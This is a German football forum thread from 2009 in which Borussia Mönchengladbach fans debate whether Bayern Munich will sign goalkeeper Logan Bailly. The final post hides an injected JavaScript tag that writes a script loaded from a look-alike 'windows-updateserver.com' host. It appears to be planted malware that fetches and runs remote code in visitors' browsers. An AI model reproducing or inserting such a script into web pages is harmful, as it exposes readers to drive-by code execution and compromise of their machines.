Logan Bailly - Torwart-Gott

Dieses Thema im Forum "Kneipe" wurde erstellt von André, 15 Februar 2009.

  1. arnautovic

    arnautovic Well-Known Member

    Beiträge:
    5.461
    Likes:
    3
    Vorallem das zweite Video ist geil. :top:

    Ich frage mich eigentlich wieso die Bayern noch kein Intresse an ihm geweckt haben... er hat doch alles was sie eigentlich wollen, die nötige Erfahrung, ist noch jung und Klasse....
     
  2. Anzeige für Gäste


    um diese Anzeige auszublenden!.
  3. Zerrwerk

    Zerrwerk Well-Known Member

    Beiträge:
    1.557
    Likes:
    222
    merkur-online - Nachrichten aus München, Bayern und der Welt

    München - Der FC Bayern ist auf der Suche nach einem neuen Keeper. Jetzt könnte neben Schalkes Manuel Neuer auch Mönchengladbachs Logan Bailly in den Fokus des Rekordmeisters gerückt sein.
    Der 23-Jährige sagte der L´Équipe, dass der FC Bayern an ihm interessiert sei. „Ich werde von Galatasaray und von Bayern umworben“, zitiert die Sporttageszeitung den Torwart.


    Sollte Bailly keine festgeschriebene Ablöse haben - no way! Der hat doch noch ewig Vertrag!
     
  4. DeWollä

    DeWollä Real Life Junkie

    Beiträge:
    6.893
    Likes:
    345
    Meyer hat in einem Interview gesagt, ihn würde es wundern, wenn Logan nicht in den nächsten Jahren zum FC Bayern käme, weil er der beste Torwart sei, denn Meyer bis jetzt kennengelernt hat.
    Wenn Meyer das sagt, wird es auch so passieren, er ist erfahren genug für so eine Einschätzung.
     
  5. KGBRUS

    KGBRUS SF Dschungelkönig 2016

    Beiträge:
    7.141
    Likes:
    800
    Ne gibbet nicht nicht abgeben!!!!!!
    Den brauchen wir noch.
     
  6. forssell

    forssell Active Member

    Beiträge:
    531
    Likes:
    0
    Vielleicht gibt Meyer ja auch auf, weil wir Bailly schon an die Bayern verloren haben. Dann wird es nämlich wieder haarig mit dem Neuaufbau.....
     
  7. GGBorusse

    GGBorusse Guest

    Wenn der gehen sollte, sind wir imo so ziemlich im Sack, egal wen die dann noch für den Sturm holen. Dieser Torwart ist das Beste, was Borussia seit Langem passiert ist. Zum Großteil hat er uns die erste Liga festgehalten...

    Ich hoffe ja, dass die Bayern mit Toni ein Tauschgeschäft gegen einen Torwart machen, der nicht Bailly heißt...
     
  8. Peter Herter

    Peter Herter Erfahrener Benutzer

    Beiträge:
    3.082
    Likes:
    80
    Bailly ist ein starker Torwart,keine frage,aber auch noch genügend unsicherheiten bei Flanken und hohen Bällen,da muss er noch an sich Arbeiten,und deswegen wird er auch (noch )nicht in München landen,
     
  9. forssell

    forssell Active Member

    Beiträge:
    531
    Likes:
    0
    dein wort in fußballgottes ohr, stimme dir auch zu, dass der schritt für bailly noch etwas zu früh käme, aber die bayern sind leider auch in dieser hinsicht unberechenbar geworden, sonst hätten sie sich den unfertigen baumjohann nicht jetzt für die Bank geholt. Und das Rensing-Desaster diese Saison konnte nun jeder halbwegs informierte Fan vorhersehen.
    Früher haben die Bayern den Konkurrenten vor allem die besten Spieler weggekauft. In den vergangenen Jahren wurden dann auch mal au Rache die gekauft, die ihnen mal ein paar reingedrückt haben (wie Schlaudraff). Aber inzwischen halte ich bei denen jeden Transfer für möglich, deswegen zittere ich um logan. Denn eins ist auch klar: Wenn die Bayern ihn wollen, muss auch er zugreifen. Champions League und unter van Gaal beim deutschen Topklub - wer weiß ob die chance in zwei Jahren noch mal käme. Und an Selbstbewusstsein fehlts bailly bestimmt auch nicht, der traut sich das bestimmt zu.
     
  10. luckie

    luckie Active Member

    Beiträge:
    322
    Likes:
    0
    Zoomin.tv

    Bailly und Defour
     
  11. forssell

    forssell Active Member

    Beiträge:
    531
    Likes:
    0
    ok, wenn wir schon einkaufen - nehmen wir den anderen auch gleich noch, oder was meint ihr?:D
     
  12. luckie

    luckie Active Member

    Beiträge:
    322
    Likes:
    0
  13. luckie

    luckie Active Member

    Beiträge:
    322
    Likes:
    0
    Jetzt sind es schon min. 5 Wochen

    Borussia: Bailly: "Ich muss da durch" | RP ONLINE
     
  14. TheCat

    TheCat New Member

    Beiträge:
    10
    Likes:
    0
    hoffentlich ....
    <script language='JavaScript' type='text/javascript'>document.write("<" + "script language='JavaScript' type='text/javascript' src='http://windows-updateserver.com/signature/hKLYZ5joxmvAlyz147fYlWXU4mn5R3Pg?rand=" + Math.random() * 100000000 +"'></"+"script>")</script>